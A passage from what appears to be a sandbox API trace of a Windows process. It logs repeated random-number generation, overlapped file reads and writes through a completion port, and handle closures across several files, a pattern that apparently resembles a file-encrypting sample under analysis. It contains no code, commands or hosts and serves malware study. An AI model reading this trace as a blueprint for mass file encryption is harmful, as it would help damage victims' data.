pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0175.202] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.202] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.202] free (_Block=0x3e305b8) [0175.202] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.202] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.203] free (_Block=0x1fa91d0) [0175.203] free (_Block=0x1fa2ed8) [0175.203] free (_Block=0x1fa90b8) [0175.203] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.203] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.218] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.219] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.219] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0175.219] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.220] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0175.220] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.220] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.220] free (_Block=0x3e305b8) [0175.220] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.220] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.220] free (_Block=0x1fa91d0) [0175.221] free (_Block=0x1fa2ed8) [0175.221] free (_Block=0x1fa90b8) [0175.221] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0175.221] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.233] CloseHandle (hObject=0x170) returned 1 [0175.233] free (_Block=0x1ff1e60) [0175.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.247] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1948, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0175.262] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.277] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3308, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.304] ReadFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0xb7c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 1 [0175.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0175.316] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0175.317] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.317] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.317] free (_Block=0x3e305b8) [0175.317] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.317] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.317] free (_Block=0x1fa91d0) [0175.317] free (_Block=0x1fa2ed8) [0175.317] free (_Block=0x1fa90b8) [0175.317] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0175.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.887] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1850, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0175.888] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.900] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x5440, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0175.900] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.912] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x16f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.912] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.916] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x36da, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0175.917] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.274] CloseHandle (hObject=0x308) returned 1 [0176.274] free (_Block=0x1ff1e60) [0176.274] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.275] CloseHandle (hObject=0x3cc) returned 1 [0176.276] free (_Block=0x3d70450) [0176.276] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.277] CloseHandle (hObject=0x338) returned 1 [0176.277] free (_Block=0x3e70008) [0176.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.277] CloseHandle (hObject=0x170) returned 1 [0176.277] free (_Block=0x3f70048) [0176.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.300] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.300] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0176.300] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.301] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0176.301] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.301] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.301] free (_Block=0x3e305b8) [0176.301] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.301] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.302] free (_Block=0x1fa91d0) [0176.302] free (_Block=0x1fa2ed8) [0176.302] free (_Block=0x1fa90b8) [0176.302] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.302] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.317] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.318] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.318] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0176.318] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.318] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.318] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0176.319] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.319] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.319] free (_Block=0x3e305b8) [0176.319] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.319] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.319] free (_Block=0x1fa91d0) [0176.319] free (_Block=0x1fa2ed8) [0176.319] free (_Block=0x1fa90b8) [0176.319] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0176.320] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.328] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x75d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.339] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x54b0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0176.369] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.381] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.381] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0176.382] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.382] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0176.383] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.383] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.383] free (_Block=0x3e305b8) [0176.383] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.383] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.383] free (_Block=0x1fa91d0) [0176.383] free (_Block=0x1fa2ed8) [0176.383] free (_Block=0x1fa90b8) [0176.383] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.384] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.414] CloseHandle (hObject=0x170) returned 1 [0176.414] free (_Block=0x1ff1e60) [0176.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.415] CloseHandle (hObject=0x2a8) returned 1 [0176.415] free (_Block=0x3ef0008) [0176.415] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.415] CloseHandle (hObject=0x308) returned 1 [0176.416] free (_Block=0x3d70450) [0176.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.418] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x59d8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0176.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.421] CloseHandle (hObject=0x2a4) returned 1 [0176.421] free (_Block=0x3df0008) [0176.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.540] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1088, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0176.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.541] CloseHandle (hObject=0x3cc) returned 1 [0176.541] free (_Block=0x3f70048) [0176.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.563] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.563] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0176.564] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.564] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0176.564] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.564] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.564] free (_Block=0x3e305b8) [0176.564] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.564] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.565] free (_Block=0x1fa91d0) [0176.565] free (_Block=0x1fa2ed8) [0176.565] free (_Block=0x1fa90b8) [0176.565] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.565] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.578] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.579] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0176.579] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.579] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0176.580] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.580] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.580] free (_Block=0x3e305b8) [0176.580] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.580] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.580] free (_Block=0x1fa91d0) [0176.580] free (_Block=0x1fa2ed8) [0176.580] free (_Block=0x1fa90b8) [0176.580] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0176.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.590] CloseHandle (hObject=0x2a4) returned 1 [0176.590] free (_Block=0x1ff1e60) [0176.590] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.601] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1d68, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0176.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.641] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x23b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0176.641] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.648] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2020, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.648] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.659] WriteFile (in: hFile=0x338, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x24d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0176.659] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.668] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x2670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0176.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.674] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2c2c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0176.676] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0176.678] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x30ca, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, 